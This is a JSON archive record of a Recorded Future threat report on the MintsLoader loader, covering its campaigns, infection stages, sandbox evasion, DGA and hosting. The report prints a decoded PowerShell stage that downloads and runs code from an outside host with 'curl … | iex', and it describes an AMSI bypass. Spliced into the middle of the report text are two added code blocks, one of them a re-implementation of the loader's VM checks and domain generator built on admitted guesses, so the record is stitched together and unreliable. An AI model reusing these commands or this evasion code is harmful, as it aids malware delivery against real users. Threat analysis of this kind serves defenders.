{
	"id": "b53e26f7-5564-4b42-96f1-0c755a285530",
	"created_at": "2026-04-29T08:21:41.082116Z",
	"updated_at": "2026-04-29T10:41:56.548905Z",
	"deleted_at": null,
	"sha1_hash": "7ef23fd4ec87acdbeba339a54da29e5648dc7948",
	"title": "MintsLoader Malware Analysis: Multi-Stage Loader Used by TAG-124 and SocGholish",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 11378321,
	"plain_text": "MintsLoader Malware Analysis: Multi-Stage Loader Used by\r\nTAG-124 and SocGholish\r\nBy Insikt Group®\r\nArchived: 2026-04-29 06:59:16 UTC\r\nExecutive Summary\r\nMintsLoader, a malicious loader, was first observed in multiple phishing and drive-by download campaigns as\r\nearly as 2024. The loader commonly deploys second-stage payloads such as GhostWeaver, StealC, and a modified\r\nBOINC (Berkeley Open Infrastructure for Network Computing) client. MintsLoader operates through a multi-stage infection chain involving obfuscated JavaScript and PowerShell scripts. The malware employs sandbox and\r\nvirtual machine evasion techniques, a domain generation algorithm (DGA), and HTTP-based command-and-control (C2) communications.\r\nMintsLoader has been observed being used by various threat groups; however, operators of TAG-124 (also known\r\nas LandUpdate808) have used it extensively. The loader is deployed through multiple infection vectors, including\r\nphishing emails targeting the industrial, legal, and energy sectors (TAG-124); compromised websites\r\nimpersonating browser update prompts (SocGholish); and invoice-themed lures distributed via Italy’s PEC\r\ncertified email system.\r\nMintsLoader’s use of obfuscation complicates static detections such as YARA rules, its use of DGA-based C2\r\ninfrastructure makes it difficult to maintain up-to-date watchlists or blocklists, and its anti-analysis techniques\r\ncomplicate host-based detections that rely on sandboxes or virtualization. But Recorded Future’s Malware\r\nIntelligence Hunting identifies new MintsLoader samples and associated C2 domains and provides an up-to-date\r\nlist for blocklists or threat hunting.\r\nMintsLoader’s persistent use of obfuscation, sandbox evasion, and adaptive infrastructure likely ensures its\r\ncontinued presence within the malware ecosystem, likely leading to increased use by additional threat actors. 
The\r\nmalware’s role as a versatile delivery mechanism reflects the increasing professionalization and specialization\r\nwithin the cybercriminal community. While this growing sophistication benefits threat actors by enabling more\r\nresilient and efficient operations, it may simultaneously provide opportunities for defenders to identify and disrupt\r\nmalicious activity more effectively and at scale.\r\nKey Findings\r\nMintsLoader's second-stage PowerShell script uses sandbox and virtual environment evasion techniques,\r\nreducing its susceptibility to automated analysis and increasing its likelihood of bypassing dynamic\r\nhttps://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting\r\nPage 1 of 18\n\ndetection tools.\r\nMintsLoader's use of a DGA to generate daily C2 domains based on the system date complicates\r\ninfrastructure monitoring activity and domain/IP-based detections.\r\nRecorded Future’s Malware Intelligence Hunting provides up-to-date C2 domains and other artifacts\r\nrelated to MintsLoader that would otherwise be hard to track due to its dynamic infrastructure.\r\nInsikt Group shows that GhostWeaver is the primary payload deployed by MintsLoader across observed\r\ncampaigns.\r\nGhostWeaver’s self-signed X.509 certificates are similar to those of AsyncRAT and variants of AsyncRAT,\r\nleading to initial false associations with other malware families such as AsyncRAT.\r\nBackground\r\nOrange Cyberdefense first detected MintsLoader in widespread distribution campaigns between July and October\r\n2024. Insikt Group identified earlier campaigns in February 2024, based on Palo Alto’s Unit42 analysis of a\r\nSocGholish infection.\r\nThe loader consists of JavaScript (stage one) and PowerShell (stage two) scripts retrieved from multiple DGA-based domains. The name “MintsLoader” is derived from its distinctive use of the URL parameter\r\ns=mints[NUMBER] (for example, s=mints11). 
MintsLoader is typically observed in campaigns delivering\r\nsecondary payloads such as GhostWeaver, StealC, and the Berkeley Open Infrastructure for Network Computing\r\n(BOINC) client.\r\nFigure 1: MintsLoader profile (Source: Recorded Future)\r\nWhile MintsLoader is believed to be used by multiple threat actors, TAG-124 (also known as LandUpdate808)\r\ninfections have frequently been observed deploying MintsLoader. Additionally, threat actors using SocGholish\r\nwere early adopters of MintsLoader, resulting in the initial assessment of MintsLoader campaigns as being\r\nexclusively associated with SocGholish. For example, in February 2024, Palo Alto’s Unit42 released indicators\r\nlinked to SocGholish (Figure 2); however, Insikt Group's analysis indicates that the URLs identified as delivering\r\nAsyncRAT also align with known MintsLoader URL patterns.\r\nFigure 2: Palo Alto SocGholish infection IoCs (Source: Recorded Future)\r\nSimilarly, in July 2024, Huntress Labs reported a SocGholish infection delivering a BOINC client. Notably, the\r\nURL used to download the BOINC client matches known MintsLoader URL patterns. Figure 3 shows a high-level\r\noverview of the threat actors that use MintsLoader.\r\nFigure 3: Threat actors' use of MintsLoader (Source: Recorded Future)\r\nBelow are recently reported campaigns involving MintsLoader.\r\nMintsLoader and KongTuke/ClickFix pages\r\nIn early 2025, security analysts observed a phishing campaign delivering MintsLoader as a first-stage loader.\r\nPhishing emails (targeting the energy, oil and gas, and legal sectors in the US and Europe) carried either a\r\nmalicious JavaScript attachment or a link to a fake “Click to verify” web page. 
Figure 4 shows examples of\r\nClickFix pages.\r\nIn both cases, the result was the execution of MintsLoader’s PowerShell-based second stage on the victim’s\r\nmachine. This loader pulled down the final payloads, notably the StealC infostealer and a modified BOINC client\r\nbuild. The campaign leveraged fake CAPTCHA verification pages (ClickFix/KongTuke lures) to trick users into\r\nexecuting a copied PowerShell command, which downloaded and ran MintsLoader (Figure 5).\r\nFigure 5: MintsLoader ClickFix infection chain (Source: Recorded Future)\r\nOther infection chains in this campaign delivered MintsLoader via a downloaded ‘Fattura########.js’ file (Italian\r\nfor “invoice”) that victims opened, leading to the same PowerShell loader execution. Researchers at eSentire’s\r\nThreat Response Unit reported this campaign and noted the threat actors’ focus on industrial and professional\r\nservices targets across North America and Europe.\r\nSocGholish “FakeUpdates” Campaigns\r\nMultiple reports indicate (1, 2) that the SocGholish (FakeUpdates) threat actors incorporated MintsLoader into\r\ntheir operations. Starting around July 2024, SocGholish infections from compromised websites showed infection\r\nchains installing the BOINC distributed-computing client via MintsLoader.\r\nIn this drive-by campaign, shown in Figure 6, victims browsing legitimate but compromised sites encountered\r\nfake browser update prompts (often originating from an update.js script). 
If run, the malicious JavaScript fetched\r\nan obfuscated MintsLoader payload, kicking off a multi-step PowerShell sequence.\r\nFigure 6: MintsLoader fake updates example (Source: TRAC Labs)\r\nHuntress Labs documented two parallel outcomes: one branch resulted in a fileless AsyncRAT running in memory,\r\nwhile the other led to a stealthy BOINC installation under attacker control. The BOINC deployment was notably\r\nmodified and configured to connect to a malicious C2 rather than the standard BOINC server.\r\nIn some cases, the GhostWeaver PowerShell backdoor (tracked by Mandiant as UNC4108) was also delivered via\r\nMintsLoader, providing attackers with a persistent foothold and a platform to load additional plugins.\r\nInvoice Phishing in Europe\r\nAnother MintsLoader campaign in late 2024 targeted European organizations via invoice-themed phishing emails,\r\nan example of which is shown in Figure 7. Spam messages leveraged Italy’s PEC (certified email) system to add\r\nlegitimacy and lured recipients into opening attached JavaScript files masquerading as invoices. The Spamhaus\r\nresearch team dubbed this the “PEC invoice scam” and highlighted how the attackers abused trusted email\r\nchannels to bypass security checks. This campaign was noted for “stealing time, money, and trust from\r\nbusinesses.”\r\nFigure 7: PEC phishing email (Source: Spamhaus)\r\nTechnical Analysis\r\nMintsLoader uses a multi-stage execution chain involving JavaScript and PowerShell, with each stage employing\r\nobfuscation to hinder analysis. Although MintsLoader functions solely as a loader without supplementary\r\ncapabilities, its primary strengths lie in its sandbox and virtual machine evasion techniques and a DGA\r\nimplementation that derives the C2 domain from the day it is run. 
These features significantly complicate\r\nstatic analysis and host-based detection. On the other hand, its C2 communications occur over plain HTTP with a fixed URL shape, which provides a\r\nreliable vector for detecting and identifying new samples at the network level. Figure 8 provides the high-level capabilities of\r\nMintsLoader.\r\nFigure 8: MintsLoader high-level capabilities (Source: Recorded Future)\r\nThis analysis of MintsLoader includes details on the first- and second-stage payloads and MintsLoader\r\ninfrastructure.\r\nMintsLoader Attack Chain\r\nMintsLoader is commonly delivered via phishing emails containing links to KongTuke or ClickFix pages. These pages\r\ndeliver the first-stage JavaScript. The JavaScript is heavily obfuscated, and\r\nexecuting it runs a PowerShell command that downloads and executes the second stage of MintsLoader, as\r\nshown in Figure 9.\r\nThis second stage conducts environment checks to determine whether it is running in a sandbox or virtualized\r\nsetting. Next, the script uses a DGA to produce the next C2 domain. MintsLoader then attempts to contact the\r\ngenerated domain to download the final payload, such as GhostWeaver, StealC, or the BOINC client. Figure 10\r\nshows a high-level overview of this attack chain.\r\nFigure 10: Common MintsLoader infection chain (Source: Recorded Future)\r\nStage One: JavaScript\r\nThe initial stage of MintsLoader consists of a JavaScript file that executes a PowerShell command to retrieve the\r\nsecond stage. The script is heavily obfuscated using junk comments, meaningless variable and function names,\r\ncharacter replacement, and string encoding (Figure 11). 
Insikt Group found 141 MintsLoader stage one samples\r\nusing data derived from Recorded Future Malware Intelligence Hunting (Appendix A).\r\nFigure 11: MintsLoader stage one obfuscated JavaScript (Source: Recorded Future)\r\nThe core function of the stage one JavaScript payload is to run a PowerShell command of the form\r\n‘curl -useb http://[domain]/1.php?s=[campaign] | iex’, which downloads the second stage and passes it to Invoke-Expression. In Windows PowerShell, ‘curl’ is\r\na built-in alias for Invoke-WebRequest and ‘-useb’ is an abbreviation of its -UseBasicParsing parameter, so the cURL program is not\r\nactually used to make the HTTP request. (PowerShell 7 no longer ships the curl alias, so this chain relies on the Windows PowerShell 5.1 that ships with Windows.)\r\nInsikt Group identified three distinct versions of the stage one loader, all of which employ the same JavaScript\r\nobfuscation techniques but differ in how the PowerShell command is constructed.\r\nThe first variant executes the PowerShell command in clear text, with the C2 domain hard-coded, as shown in\r\nFigure 12. This variant is seen in the “mints13” and “flibabc11” campaigns.\r\nIn the second variant, the PowerShell command is obfuscated using character replacement. The C2 domain is\r\nstill hard-coded, and an alias for the curl command is used instead, but the objective is still to download the next\r\nstage (Figure 13). This is the most widely used variant across the campaigns: “flibabc21”, “flibabc22”, “mints11”,\r\n“mints13”, “mints21”, and “mints42”.\r\nThe third variant encodes the command in Base64 (Figure 14). Insikt Group has seen this method used with the\r\nolder campaign “mints13”.\r\nIn this version, the decoded PowerShell command (Table 1) writes a file containing a further PowerShell command that\r\ndownloads the second stage via the curl alias. 
It then runs the file and deletes it. Note that $randomNamePart1 and the time arithmetic at the top of the listing are computed but never used.\r\n$ErrorActionPreference = \"Continue\"\r\n$randomNamePart1 = -join ((48..57) + (97..122) | Get-Random -Count 5 | % { [char]$_ });\r\n$currentTimeHour = [int](Get-Date -Format HH);\r\n$currentTimeMinute = [int](Get-Date -Format mm);\r\n$minuteAdjustment = 3;\r\nIf ($currentTimeMinute + $minuteAdjustment -gt 59) {\r\n$currentTimeHour = $currentTimeHour + 1;\r\n$currentTimeMinute = $currentTimeMinute + $minuteAdjustment - 60;\r\n} Else {\r\n$currentTimeMinute = $currentTimeMinute + $minuteAdjustment;\r\n};\r\n$currentTimeHour = If (([int](Get-Date -Format HH) + 1) -gt 23) { \"00\" } Else { $currentTimeHour };\r\n$randomNamePart2 = -join ((65..90) + (97..122) | Get-Random -Count 12 | % { [char]$_ });\r\n$scriptToExecute = @\"\r\n$ErrorActionPreference = \"Continue\"\r\ncurl -useb \"http://gibuzuy37v2v\\[.]top/1.php?s=mints13\" | iex;\r\nRemove-Item \"C:\\Users\\Public\\Documents\\$($randomNamePart2).ps1\" -Force\r\n\"@;\r\n\"powershell -noprofile -executionpolicy bypass -WindowStyle hidden -c $($scriptToExecute)\" | Out-File -FilePath \"C:\\Users\\Public\\Documents\\$($randomNamePart2).ps1\";\r\npowershell -noprofile -executionpolicy bypass -WindowStyle hidden -File \"C:\\Users\\Public\\Documents\\$($randomNamePart2).ps1\";\r\nRemove-Item \"$env:APPDATA\\*.ps1\" -Force\r\nRemove-Item \"$env:APPDATA\\*.bat\" -Force\r\nTable 1: Decoded Base64 stage one PowerShell (Source: Recorded Future)\r\nStage One C2 Communication\r\nExecuting any variant results in an HTTP GET request to the hard-coded domain to retrieve the second-stage\r\npayload. 
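Because every stage-one variant ends in this GET, and the stage-two request (described under Stage Two C2 Communication) has an equally fixed shape, the URL itself is a practical network detection point. The following is an added example written for this page, not code from the report or from the MintsLoader sample: a PowerShell filter that pulls MintsLoader-shaped requests out of proxy-log lines, run here over constructed sample lines. The log layout and the .example hostnames are invented; the URL shapes, the campaign IDs and the WindowsPowerShell User-Agent behaviour are taken from the analysis.

```powershell
# Added example, written for this page (not code from the report): a hunting
# filter for the MintsLoader URL shapes described in this analysis, run over
# constructed proxy-log lines. Stage one: /1.php?s=<campaign>. Stage two:
# /htr.php (older samples: /2.php) with id=<hostname>, s=<campaign> and the
# integer key. The log layout and the .example hostnames are invented; the
# URL shapes, campaign IDs and the WindowsPowerShell User-Agent are from the
# analysis.

function Find-MintsLoaderUrl {
    param([string[]]$Lines)
    foreach ($line in $Lines) {
        # Host, script name and query string; [.] and [?] match those literal characters.
        if ($line -match 'https?://(?<host>[^/ ]+)/(?<script>1|2|htr)[.]php[?](?<query>[^ ]*)') {
            $m = $Matches
            $q = @{}
            foreach ($pair in ($m.query -split '&')) {
                $k, $v = $pair -split '=', 2
                if ($k) { $q[$k] = $v }
            }
            # Every MintsLoader stage carries the campaign ID in s=; a /1.php
            # or /2.php hit without it is most likely an unrelated PHP site.
            if (-not $q.ContainsKey('s')) { continue }
            # The curl alias is Invoke-WebRequest, whose default User-Agent
            # contains WindowsPowerShell/<version>; real curl and browsers never send that.
            $psAgent = $line -match 'WindowsPowerShell/'
            $stage = if ($m.script -eq '1') { 'stage1' } else { 'stage2' }
            [pscustomobject]@{
                Stage        = $stage
                C2           = $m.host
                Campaign     = $q['s']
                Victim       = $q['id']
                Key          = $q['key']
                PowerShellUA = $psAgent
            }
        }
    }
}

# Constructed log lines: timestamp, client, method, URL, status, User-Agent.
$sampleLog = @(
    '2025-04-20T10:01:02Z 10.0.0.5 GET http://stage1-c2.example/1.php?s=mints13 200 Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4046',
    '2025-04-20T10:01:09Z 10.0.0.5 GET http://dga-c2.example/htr.php?id=DESKTOP-1&s=flibabc21&key=125562702646 200 Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.4046',
    '2025-04-20T10:02:00Z 10.0.0.7 GET http://shop.example/1.php?page=2 200 Mozilla/5.0 Chrome/124.0',
    '2025-04-20T10:03:11Z 10.0.0.9 GET http://news.example/index.php?s=mints 200 Mozilla/5.0 Firefox/125.0'
)

# Run the filter over the sample; only the two MintsLoader-shaped lines survive.
Find-MintsLoaderUrl -Lines $sampleLog | Format-Table Stage, C2, Campaign, Victim, Key, PowerShellUA
```

The third and fourth sample lines are deliberate near-misses: a /1.php request without the s parameter and an index.php request that happens to carry s=mints. Requiring both the script name and the campaign parameter keeps the filter from flagging ordinary PHP sites, and the PowerShellUA column separates a scripted download from a browser visit to the same host.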
A successful request will retrieve and execute the PowerShell script shown in Figure 15.\r\nFigure 15: Successful stage two retrieval from C2 (Source: Recorded Future)\r\nIf the domain is no longer valid, a 302 response is returned, as shown in Figure 16.\r\nFigure 16: Failed stage two retrieval from C2 (Source: Recorded Future)\r\nStage Two PowerShell\r\nThe second-stage PowerShell script contains a Base64-encoded blob; decoding it, XOR-decoding the result and decompressing it yields the\r\nprimary payload, which is itself obfuscated. Figure 17 shows a snippet of this payload, illustrating\r\nMintsLoader's obfuscated string construction techniques.\r\nFigure 17: Stage two PowerShell obfuscation (Source: Recorded Future)\r\nAfter the initial deobfuscation and decoding, the second-stage PowerShell starts by attempting to bypass the\r\nAntimalware Scan Interface (AMSI) using a well-known technique that fakes an AMSI initialization failure: setting the\r\nprivate static field amsiInitFailed of the System.Management.Automation.AmsiUtils class to $true via reflection, after which AMSI scanning is skipped for the rest of the process. Because this bypass is widely signatured, it only appears once the obfuscation layers are stripped, which is itself a useful detection angle for PowerShell script block logging.\r\nThe rest of the code is responsible for executing three system information queries whose return values are used in logical\r\nexpressions to detect whether the system is running on bare metal, in a sandbox, or in a virtual machine. The result is conveyed\r\nto the C2 through an integer variable sent as the URL parameter key, and the C2 examines its value to determine whether\r\nits response will be a third stage that downloads the final payload or a decoy. 
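The following is an added example written for this page, not code from the MintsLoader sample or from Recorded Future: a readable PowerShell re-implementation of the stage-two flow described in this section and in Figures 18 to 22 (the three WMI checks, the key arithmetic, a date-seeded System.Random domain generator and the request URL), so that an analyst can see which key value their own sandbox would send. The increments, the -eq 3 and -gt 4 comparisons and the expected DAC and cache strings are those quoted for the deobfuscated sample; the WMI query behind the VM check, the increments on the failing branches, the seed formula, alphabet, label length, TLD and parameter order are assumptions.

```powershell
# Added example, written for this page: not the MintsLoader sample's code and
# not Recorded Future's. A readable re-implementation of the stage-two flow
# (environment checks, key arithmetic, date-seeded DGA, request URL) so an
# analyst can see which key their own sandbox would send. The increments, the
# '-eq 3' and '-gt 4' comparisons and the expected DAC/cache strings are the
# ones quoted for the deobfuscated sample. ASSUMED (not shown in the analysis):
# the WMI query behind the VM check, the increments on the failing branches
# (none here), the DGA seed formula, alphabet, label length and TLD, and the
# order of the URL parameters.

function Get-EnvironmentKey {
    $key = [long]0

    # Check 1: VM detection (query assumed). PowerShell converts the right
    # operand to the type of the left one, so 3 becomes $true and
    # ($true -eq 3) is $true on a VM; bare metal takes the larger increment.
    $cs = Get-CimInstance -ClassName Win32_ComputerSystem
    $isVirtualMachine = ($cs.Manufacturer + ' ' + $cs.Model) -match 'VMware|VirtualBox|QEMU|KVM|Xen|Virtual Machine'
    if ($isVirtualMachine -eq 3) { $key += 15310805757 } else { $key += 83670406277 }

    # Check 2: DAC type of the first video controller. 'Internal' or
    # 'Integrated RAMDAC' is the expected answer; emulators often return nothing.
    # Increment on the failing branch is not given in the analysis, so none here.
    $dac = (Get-CimInstance -ClassName Win32_VideoController | Select-Object -First 1).AdapterDACType
    if ($dac -match 'Internal|Integrated RAMDAC') { $key += 14467965888 }

    # Check 3: Purpose of the first cache object. 'L1 Cache' is 8 characters,
    # so -gt 4 holds on a normal host; with no cache object the value is
    # $null and ($null).Length -gt 4 is $false.
    $l1CachePurpose = (Get-CimInstance -ClassName Win32_CacheMemory | Select-Object -First 1).Purpose
    if ($l1CachePurpose.Length -gt 4) { $key += 27424330481 }

    return $key
}

function Get-DgaDomain {
    param([datetime]$Date = (Get-Date), [int]$Constant = 1337)   # constant assumed
    # Seed = calendar date as an integer plus a per-sample constant (formula
    # assumed). System.Random is deterministic for a given seed, so the same
    # code run on any machine gives the same domain for a given day.
    $seed = $Date.Year * 10000 + $Date.Month * 100 + $Date.Day + $Constant
    $rng = New-Object System.Random($seed)
    $alphabet = 'abcdefghijklmnopqrstuvwxyz0123456789'
    $label = -join (1..12 | ForEach-Object { $alphabet[$rng.Next(0, $alphabet.Length)] })
    # 12-character label and .top TLD mirror the stage-one domain in Table 1.
    return $label + '.top'
}

function Get-StageTwoRequestUrl {
    param([string]$Campaign, [long]$Key, [datetime]$Date = (Get-Date))
    # id=<hostname> and s=<campaign> as in Figure 22; key carries the check
    # result; the path is the constant htr.php (older samples used 2.php).
    return 'http://' + (Get-DgaDomain -Date $Date) + '/htr.php?id=' + $env:COMPUTERNAME + '&s=' + $Campaign + '&key=' + $Key
}

# On bare metal the three expected branches sum to 125562702646; a sandbox
# that reports a virtual model, an empty DAC type or no cache object changes it.
$key = Get-EnvironmentKey
$key
Get-StageTwoRequestUrl -Campaign 'mints13' -Key $key

# Defender use of the same determinism: precompute the coming week of domains.
0..6 | ForEach-Object { Get-DgaDomain -Date (Get-Date).AddDays($_) }
```

Two points are worth taking from this. First, the environment checks only have teeth because the C2 compares the key against the value a real host produces, so a sandbox that fakes one WMI answer but not the others still receives the decoy. Second, a date-seeded System.Random is as predictable for defenders as for the operator: once a sample's seed constant, alphabet and label length are recovered, the domains for the coming days can be generated and blocklisted before they are ever registered.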
It should be noted that the\r\nconstant integer values used to increment the key variable change with each second-stage sample.\r\nThe result of each system information query is checked against three logical expressions, the order of which varies\r\nper sample, along with constants that increment the key, whose results affect the key variable value. The logical\r\nexpressions may not provide apparent results on initial inspection. For example, if the first deobfuscated system\r\ncheck, shown below in Figure 18, were to run on a virtual machine, the $isVirtualMachine variable would be\r\nequal to $true. The logical expression \"$true -eq 3\" then evaluates to $true in PowerShell, because the right-hand operand is converted to the type of the left-hand one and the integer 3 converts to $true; the key is therefore increased by\r\n15310805757 instead of 83670406277.\r\nFigure 18: Stage two PowerShell virtual machine check (Source: Recorded Future)\r\nThe second system check queries the AdapterDACType member of the Win32_VideoController WMI object to\r\nobtain the name or identifier of the digital-to-analog converter (DAC) chip, as shown in Figure 19. This\r\ndetermines whether the infected system is running in an emulator or a virtual machine. Typically, a Windows system will\r\nreturn \"Internal\" and/or \"Integrated RAMDAC,\" which would increment the key by 14467965888 in this example.\r\nFigure 19: Stage two PowerShell video controller check (Source: Recorded Future)\r\nThe third system check queries the Purpose member of the Win32_CacheMemory WMI object, which will equal\r\n\"L1 Cache\" on a typical Windows system. 
The non-obvious logical expression \"$l1CachePurpose.length -gt 4\"\r\nis $true in the expected case, since the string \"L1 Cache\" is eight characters long, incrementing the key value by 27424330481 in the deobfuscated example seen in\r\nFigure 20.\r\nFigure 20: Stage two PowerShell memory check (Source: Recorded Future)\r\nThe system checks and calculation of the key are followed by generating a random seed based on the date and a\r\nconstant, which is used with a System.Random object to construct the domain using a simple DGA and the URL\r\npath, as shown in Figure 21. Because System.Random is deterministic for a given seed, anyone who recovers the constant from a sample can compute the same domains in advance. The author may have made a mistake by not using the second random variable to\r\nconstruct the URL path. Instead, they use an undefined variable for the URL path ending, making the URL path\r\nending the constant \"htr.php\". Note that in PowerShell, curl is an alias for Invoke-WebRequest, which is used to\r\ngenerate the request to the C2 for the third stage, so the User-Agent HTTP header carries Invoke-WebRequest's default value, including the WindowsPowerShell version\r\nstring, rather than a curl User-Agent.\r\nFigure 21: Stage two PowerShell final payload retrieval (Source: Recorded Future)\r\nStage Two C2 Communication\r\nFigure 22 shows an example of a MintsLoader request for the final payload, with a URL path ending in htr.php.\r\nThe URL parameter id is the hostname, and the URL parameter s is the campaign ID.\r\nFigure 22: Recent stage two C2 GET Request (Source: Recorded Future)\r\nAn example of an earlier MintsLoader request for the third stage is shown in Figure 23, with the URL path not\r\nrandomized but instead the constant string \"2.php\".\r\nFigure 23: Older stage two C2 GET Request (Source: Recorded Future)\r\nIf the second-stage request does not meet the C2's requirements, the response may lead to a decoy executable\r\n(Figure 24), 
as in this example, where an AsyncRAT decoy executable is downloaded from the site\r\ntemp[.]sh. This association with AsyncRAT led early reports and some network-traffic countermeasures to name the loader \"AsyncRAT Loader\", which causes MintsLoader samples to be incorrectly tagged as Async
RAT\r\neven though current MintsLoader campaigns do not deploy AsyncRAT.\r\nA recent successful attempt is shown in Figure 25; in this example, the final payload is GhostWeaver.\r\nFigure 25: MintsLoader GhostWeaver payload (Source: Recorded Future)\r\nGhostWeaver\r\nOne of the most commonly observed payloads deployed by MintsLoader is GhostWeaver, a PowerShell-based\r\nremote access trojan (RAT) exhibiting code similarities and functional overlaps with MintsLoader. Notably,\r\nGhostWeaver can deploy MintsLoader as an additional payload via its sendPlugin command. Communication\r\nbetween GhostWeaver and its command-and-control (C2) server is encrypted with TLS using an\r\nobfuscated, self-signed X.509 certificate embedded directly within the PowerShell script, which the client presents to authenticate itself to the C2 infrastructure.\r\nGhostWeaver has periodically been misclassified as AsyncRAT. Insikt Group assesses with moderate confidence\r\nthat this misclassification originated from Palo Alto Networks initially identifying a GhostWeaver sample\r\n(SHA256: fb0238b388d9448a6b36aca4e6a9e4fbcbac3afc239cb70251778d40351b5765) as a fileless AsyncRAT\r\nvariant. 
GhostWeaver and AsyncRAT share certain characteristics within their self-signed X.509 certificates, such\r\nas identical expiration dates and serial number lengths; however, these similarities may simply reflect common\r\ncertificate-generation methods rather than meaningful operational overlap.\r\nMintsLoader Infrastructure\r\nInsikt Group initially found MintsLoader C2 servers hosted solely on BLNWX but later observed growing use\r\nof other ISPs such as Stark Industries Solutions Ltd (AS44477), GWY IT Pty Ltd. (AS199959), and SCALAXY-AS\r\n(AS58061), among others. MintsLoader C2 IP addresses announced via SCALAXY-AS are operated by the hosting\r\nproviders 3NT Solutions LLP and IROKO Networks Corporation, both of which are part of the Russian-language bulletproof hosting provider Inferno Solutions (inferno[.]name). The switch to SCALAXY-AS and Stark\r\nIndustries Solutions suggests that MintsLoader operators have shifted from relying on anonymous virtual private\r\nserver (VPS) providers to more traditional bulletproof hosters, likely in an effort to harden their infrastructure\r\nagainst takedown attempts and enhance operational stability.\r\nOver the past several months, Insikt Group has identified a range of suspected additional campaign IDs and\r\npayloads (Table 2). 
This data is compiled from open research and Insikt Group’s internal research.\r\nCampaign ID | Observed Final Payload | Last Date Active | Notes\r\n--- | --- | --- | ---\r\n521 | StealC | 2025-04-20 |\r\n522 | StealC | 2025-04-20 |\r\n523 | StealC | 2025-04-20 | Observed in connection with AsyncRAT infections\r\n524 | StealC | 2025-04-20 | N/A\r\n527 | GhostWeaver | 2025-04-20 | Linked to TAG-124 by Insikt Group\r\nflibabc11 | GhostWeaver | 2025-04-20 |\r\nflibabc12 | GhostWeaver | 2025-04-20 |\r\nflibabc13 | GhostWeaver | 2025-04-20 |\r\nflibabc14 | StealC | 2025-04-20 |\r\nflibabc21 | GhostWeaver | 2025-04-20 |\r\nflibabc22 | GhostWeaver | 2025-04-20 |\r\nflibabc23 | GhostWeaver | 2025-04-20 |\r\nflibabc25 | GhostWeaver | 2025-04-20 |\r\n515 | N/A | N/A | Observed in connection with AsyncRAT infections\r\n578 | N/A | N/A | Linked to TAG-124 via the domain sesraw[.]com, which Insikt Group had previously linked to TAG-124\r\n579 | N/A | N/A | Observed in connection with AsyncRAT infections\r\nboicn | N/A | N/A | Observed in connection with AsyncRAT infections\r\nmints1 | N/A | N/A | N/A\r\nmints11 | N/A | N/A | N/A\r\nmints12 | N/A | N/A | N/A\r\nmints13 | N/A | N/A | N/A\r\nmints21 | N/A | N/A | N/A\r\nTable 2: Suspected MintsLoader campaign IDs (Source: Recorded Future)\r\nTwo additional potential campaign IDs, js2 and dav, were observed in 2023, with js2 identified in an AsyncRAT\r\ninfection.\r\nSource: 
https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.recordedfuture.com/research/uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting"
	],
	"report_names": [
		"uncovering-mintsloader-with-recorded-future-malware-intelligence-hunting"
	],
	"threat_actors": [
		{
			"id": "4390d8ec-605d-493a-81ee-d5ef80c07046",
			"created_at": "2025-05-29T02:00:03.223467Z",
			"updated_at": "2026-04-29T10:39:53.882509Z",
			"deleted_at": null,
			"main_name": "TAG-124",
			"aliases": [
				"LandUpdate808"
			],
			"source_name": "MISPGALAXY:TAG-124",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1777450901,
	"ts_updated_at": 1777459316,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/7ef23fd4ec87acdbeba339a54da29e5648dc7948.pdf",
		"text": "https://archive.orkl.eu/7ef23fd4ec87acdbeba339a54da29e5648dc7948.txt",
		"img": "https://archive.orkl.eu/7ef23fd4ec87acdbeba339a54da29e5648dc7948.jpg"
	}
}